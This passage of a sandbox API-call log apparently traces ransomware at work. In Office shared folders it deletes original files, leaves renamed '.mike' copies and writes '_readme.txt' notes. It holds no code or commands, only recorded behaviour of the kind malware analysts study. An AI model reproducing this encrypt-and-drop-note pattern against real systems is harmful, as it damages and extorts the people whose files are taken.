ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe3497c60, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x460)) returned 1 [0042.090] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0042.090] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", lpFilePart=0x0) returned 0x4d [0042.090] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", dwFileAttributes=0x80) returned 1 [0042.090] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", nBufferLength=0x105, lpBuffer=0x2aece0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", lpFilePart=0x0) returned 0x4d [0042.090] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest")) returned 1 [0042.091] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", lpFilePart=0x0) returned 0x4d [0042.091] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0042.091] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0042.092] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0042.092] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", lpFilePart=0x0) returned 0x4d [0042.092] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\_readme.txt", lpFilePart=0x0) returned 0x43 [0042.092] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af068) returned 1 [0042.092] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\_readme.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0042.092] GetFileType (hFile=0x264) returned 0x1 [0042.092] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af064) returned 1 [0042.092] GetFileType (hFile=0x264) returned 0x1 [0042.092] WriteFile (in: hFile=0x264, lpBuffer=0x2221f48*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af100, lpOverlapped=0x0 | out: lpBuffer=0x2221f48*, lpNumberOfBytesWritten=0x2af100*=0x45e, lpOverlapped=0x0) returned 1 [0042.093] CloseHandle (hObject=0x264) returned 1 [0042.093] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP", lpFilePart=0x0) returned 0x44 [0042.094] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF", lpFilePart=0x0) returned 0x43 [0042.094] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1ec) returned 1 [0042.094] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION", lpFilePart=0x0) returned 0x37 [0042.094] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", nBufferLength=0x105, lpBuffer=0x2aecc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", lpFilePart=0x0) returned 0x38 [0042.094] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*", lpFindFileData=0x2aef14 | out: lpFindFileData=0x2aef14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe34bddc0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe34bddc0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0042.094] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe34bddc0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe34bddc0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.094] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0042.094] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d107e00, ftCreationTime.dwHighDateTime=0x1bb541c, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x5d107e00, ftLastWriteTime.dwHighDateTime=0x1bb541c, nFileSizeHigh=0x0, nFileSizeLow=0x9fd, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQNEDT32.CNT", cAlternateFileName="")) returned 1 [0042.094] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28305200, ftCreationTime.dwHighDateTime=0x1c2f1c2, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x28305200, ftLastWriteTime.dwHighDateTime=0x1c2f1c2, nFileSizeHigh=0x0, nFileSizeLow=0x84a48, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQNEDT32.EXE", cAlternateFileName="")) returned 1 [0042.095] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3497c60, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe3497c60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe3497c60, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x460, dwReserved0=0x0, dwReserved1=0x0, cFileName="eqnedt32.exe.manifest.mike", cAlternateFileName="EQNEDT~1.MIK")) returned 1 [0042.095] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bd0200, ftCreationTime.dwHighDateTime=0x1be1298, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x3bd0200, ftLastWriteTime.dwHighDateTime=0x1be1298, nFileSizeHigh=0x0, nFileSizeLow=0x2b0b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQNEDT32.HLP", cAlternateFileName="")) returned 1 [0042.095] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95fd7600, ftCreationTime.dwHighDateTime=0x1bc9dc7, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x95fd7600, ftLastWriteTime.dwHighDateTime=0x1bc9dc7, nFileSizeHigh=0x0, nFileSizeLow=0x1de8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MTEXTRA.TTF", cAlternateFileName="")) returned 1 [0042.095] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe34bddc0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe34bddc0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe34bddc0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0042.095] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe34bddc0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe34bddc0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe34bddc0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0042.095] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0042.095] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0042.095] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1b8) returned 1 [0042.096] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\.", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033", lpFilePart=0x0) returned 0x3c [0042.096] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0042.096] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0042.096] CoTaskMemFree (pv=0x4fe370) [0042.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0042.096] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033", lpFilePart=0x0) returned 0x3c [0042.096] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0042.096] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033", lpFilePart=0x0) returned 0x3c [0042.096] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", lpFilePart=0x0) returned 0x3d [0042.096] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0042.138] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.138] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x723f8e00, ftCreationTime.dwHighDateTime=0x1c2e156, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x723f8e00, ftLastWriteTime.dwHighDateTime=0x1c2e156, nFileSizeHigh=0x0, nFileSizeLow=0xfa60, dwReserved0=0x0, dwReserved1=0x0, cFileName="EEINTL.DLL", cAlternateFileName="")) returned 1 [0042.138] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0042.138] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0042.138] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0042.138] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0042.138] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL", lpFilePart=0x0) returned 0x47 [0042.138] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0042.138] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033", lpFilePart=0x0) returned 0x3c [0042.138] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", lpFilePart=0x0) returned 0x3d [0042.139] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0042.139] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.139] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x723f8e00, ftCreationTime.dwHighDateTime=0x1c2e156, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x723f8e00, ftLastWriteTime.dwHighDateTime=0x1c2e156, nFileSizeHigh=0x0, nFileSizeLow=0xfa60, dwReserved0=0x0, dwReserved1=0x0, cFileName="EEINTL.DLL", cAlternateFileName="")) returned 1 [0042.139] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x723f8e00, ftCreationTime.dwHighDateTime=0x1c2e156, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x723f8e00, ftLastWriteTime.dwHighDateTime=0x1c2e156, nFileSizeHigh=0x0, nFileSizeLow=0xfa60, dwReserved0=0x0, dwReserved1=0x0, cFileName="EEINTL.DLL", cAlternateFileName="")) returned 0 [0042.139] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0042.139] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0042.139] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0042.139] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\.", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO", lpFilePart=0x0) returned 0x33 [0042.139] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0042.139] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0042.139] CoTaskMemFree (pv=0x4fe370) [0042.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0042.140] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO", nBufferLength=0x105, lpBuffer=0x2aed24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO", lpFilePart=0x0) returned 0x33 [0042.140] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1ec) returned 1 [0042.140] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO", lpFilePart=0x0) returned 0x33 [0042.140] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", nBufferLength=0x105, lpBuffer=0x2aecc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", lpFilePart=0x0) returned 0x34 [0042.140] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\*", lpFindFileData=0x2aef14 | out: lpFindFileData=0x2aef14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58c7d970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x58c7d970, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0042.151] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58c7d970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x58c7d970, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.152] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b4ffc00, ftCreationTime.dwHighDateTime=0x1cac1f6, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6b4ffc00, ftLastWriteTime.dwHighDateTime=0x1cac1f6, nFileSizeHigh=0x0, nFileSizeLow=0x7980, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOEURO.DLL", cAlternateFileName="")) returned 1 [0042.152] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0042.152] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0042.152] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0042.152] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1b8) returned 1 [0042.152] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL", lpFilePart=0x0) returned 0x3f [0042.152] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1ec) returned 1 [0042.152] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO", lpFilePart=0x0) returned 0x33 [0042.152] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", nBufferLength=0x105, lpBuffer=0x2aecc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", lpFilePart=0x0) returned 0x34 [0042.152] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\*", lpFindFileData=0x2aef14 | out: lpFindFileData=0x2aef14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58c7d970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x58c7d970, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0042.152] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58c7d970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x58c7d970, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.153] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b4ffc00, ftCreationTime.dwHighDateTime=0x1cac1f6, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6b4ffc00, ftLastWriteTime.dwHighDateTime=0x1cac1f6, nFileSizeHigh=0x0, nFileSizeLow=0x7980, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOEURO.DLL", cAlternateFileName="")) returned 1 [0042.153] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b4ffc00, ftCreationTime.dwHighDateTime=0x1cac1f6, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6b4ffc00, ftLastWriteTime.dwHighDateTime=0x1cac1f6, nFileSizeHigh=0x0, nFileSizeLow=0x7980, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOEURO.DLL", cAlternateFileName="")) returned 0 [0042.153] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0042.153] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0042.153] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1b8) returned 1 [0042.153] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\.", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters", lpFilePart=0x0) returned 